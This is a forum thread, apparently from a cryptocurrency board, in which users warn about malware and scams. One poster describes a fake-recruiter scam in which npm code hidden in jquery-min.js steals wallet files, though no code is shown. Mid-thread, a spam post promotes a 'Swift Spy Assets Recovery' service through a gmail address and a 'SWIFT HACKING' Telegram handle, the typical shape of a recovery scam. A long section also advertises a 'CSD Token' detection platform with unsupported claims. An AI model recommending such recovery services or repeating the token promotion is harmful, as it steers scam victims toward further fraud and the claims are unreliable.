Topic: Beware of Increasingly Sophisticated Malware Infection Attempts (Read 858475 times)

Malware infections are very detrimental to all of us. and I have experienced something like that. and this is what makes me quite careful about entering sites that are not clear.

Recovering funds lost to cryptocurrency scams can be a daunting process, but there are legitimate options available if you approach the situation carefully. Here’s a comprehensive guide on the most effective ways to recover your funds, along with information about legitimate recovery options:
1. Contact a Trusted Recovery Company: Swift Spy Assets Recovery is a reputable firm known for successfully retrieving stolen cryptocurrency. They use advanced tools and expertise to track and recover lost funds.
2. Gather Evidence: Collect all relevant documents and details about the scam, including transaction records and communications.
3. File Reports: Report the scam to local authorities and organizations like the Internet Crime Complaint Center (IC3).
4. Consult a Tax Professional: Be aware of potential tax implications from recovered funds. Document everything and seek professional advice for proper tax reporting.

By choosing a reputable recovery company like Swift Spy Assets Recovery and following these steps, you can improve your chances of recovering lost funds while managing any associated tax implications effectively. For more information on reaching out to Swift Spy Assets Recovery Email Swiftrecoveryservice006 @ gmail.com Or Telegram SWIFT HACKING

Thank you for sharing this. It's a crucial reminder to stay vigilant, especially in the Web3 space where scams can be sophisticated. Running any unknown npm packages, especially from unverified sources, is risky and can lead to severe security breaches. It's always best to use a sandbox or a virtual environment to test unknown code and thoroughly inspect it before running it on your machine. It's sad to see so much effort put into scams rather than building something constructive, but awareness like this can help others avoid falling victim. Stay safe!

Great advice! It's essential to stay vigilant in the crypto space. Always double-check URLs, verify announcements, and avoid connecting wallets to unknown sites. Protecting your funds should always be the top priority—using tools like VirusTotal or any.run and keeping large funds on a separate, secure device are smart steps. Thanks for sharing these tips!

Thanks for your input! You're absolutely right—keeping a separate device for crypto trading is a smart move, especially with the rise in sophisticated scams and malware. It’s unfortunate that even the best anti-malware solutions can't always keep up with new threats. By using a dedicated device, you minimize the risk and protect your assets more effectively. Staying cautious and avoiding unnecessary downloads is essential in this digital age. Safety first!

On LinkedIn and Upwork I've received a number of contacts saying they would like to hire for a few different reasons. One was for finding some problems with their Web3 site, another for adding features, another to change blockchains, others for similar reasons. They would point to a github account which invariably included some react based node and asked to look at what exists and then schedule a call to talk.

The scam here is they expect you to run some random npm on a windows box. This would search your machine for any wallet software, upload it elsewhere, and then install any other files from an offsite host.  I'm not sure if any windows firewall or AV would catch the issue.  The nasty code has been hiding in jquery-min.js and similar, deobfuscating the code shows a long list of potential wallet file locations to grab and the IP addresses of where to upload and also download further files.

I have no idea on the effectiveness of this approach as any real dev shouldn't run unknown software on a local machine. However the javascript was 500 lines of rather interesting code so there was some work put into the scam.

Yes the points you mentioned are very technical and clear but the last one is the key to the door of a safe trading era. You have to keep a device for daily activities that has no link with your device if trading it has a number of reasons.

Nowadays scamming has so much increased and the techniques are so much efficient that if you use a PC or mobile, it surely will be subjected to some malware. It has became almost impossible to avoid such kind of activities although anti malware companies are developing software but they're not meeting the requirements .So the best way to keep yourself safe is keep separate mobile for crypto use ans don't download unnecessary files and software.

My friend's account got swiped with keyboard malware virus. Just coz he did copy and paste. This scams ain't funny

Yes, you said the truth, almost the same experience as mine, those guys are very smart and are on the ground standby immediately they got a victim to move any funds in the wallet they got access to , but I can't really say if they are using a robot to run that shit. Even recently I have been receiving a phishing link via email, I don't take time to delete them when I see any of those links.

Dont download and run unknown files... use virustotal or any.run to check "unpopular" applications.

Dont sign transactions or connect web3 wallets such as metamask, trust wallet ect to unknown websites.

Do your due diligence, double check urls, cross check from here or social medias. Even when discords or twitter make announcements wait and cross check sometimes even those platforms get hacked and people use them to make announcement to fraudulent or malicious links that steal your funds.

Basically always think before you make a move with your crypto.

Again as many users said if you have large funds its best to keep them on a separate device that's not used for daily internet activities such as gaming ,downloading social media ect.

The usual Windows defender helps me a lot.
The main thing is not to download dubious files

This one is actually pretty old, a couple years I'd say. Now it's more a meme than anything else. The malicious wallet signatures were and still are a pretty dangerous thing.

I was intrigued by a scam which consists in revealing its mnemonic phrase on a forum, on twitter or other.
So I installed one of this wallet which indeed has funds. I observed what was happening and asked for explanations (to a bitcointalker): there are erc20 tokens in a wallet for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.

Common things to watch are obviously files, this can be from github, youtube video description links, gmail/email attachments and or esp torrents. Bound with malware and or stealers. Honestly id recommend keeping wallets separate from any computer you do downloads, surfing ect. Also with NFTs / Defi be careful to make sure what your signing with your wallet as it can be drained. Furthermore never interact with nfts/coins that just show up or were airdropped in your wallet as another member stated interacting with unknown "malicious" smart contracts can end up in a total transfer of your funds. STAY SAFE OUT THERE FOLKS!

Things are getting sophisticated these days the way scammers are using to steal from different accounts and wallets. They can even clone a website like the big websites we have that have huge customers making it to look alike and then dropping the link to there cloned websites on the internet and to different dm so that once you click it and login to your account, they will save the password and have access to the account. We need to look out for different ways many of these scammers are using to steal from us.

when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?

I haven't heard of any crypto malware or viruses on the Macbook M1 models. They use different code (not x64), and a different OS (unix based) so they should not be able to get 99% of viruses by default. If you know of any I should look out for, do tell. I actually switched to a macbook to use Candle Chain and Polygon DApps on metamask and have had 0 hacks. I also moved my cold storage to a tangem wallet, which is safer IMO than a ledger.

Wow, among all my time in the crypto space, I never even imagine a virus linked to a coin/token source code which can actually hijack ones wallet.. I should should be more careful the kind of coin ones transact this days on ward.

The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrosus topic and the applications of blockchain technologies came with a total lack of regulations in order to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to be witnesses of DeFi rising scams.

DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft
volume in 2021, a large increase from only 25% in 2020.

Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.

At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.




We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?







[/color]


Simplified trading

In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism


The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection


Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection

As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors







Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.

Good information. However, add some more to make it better. We need more information!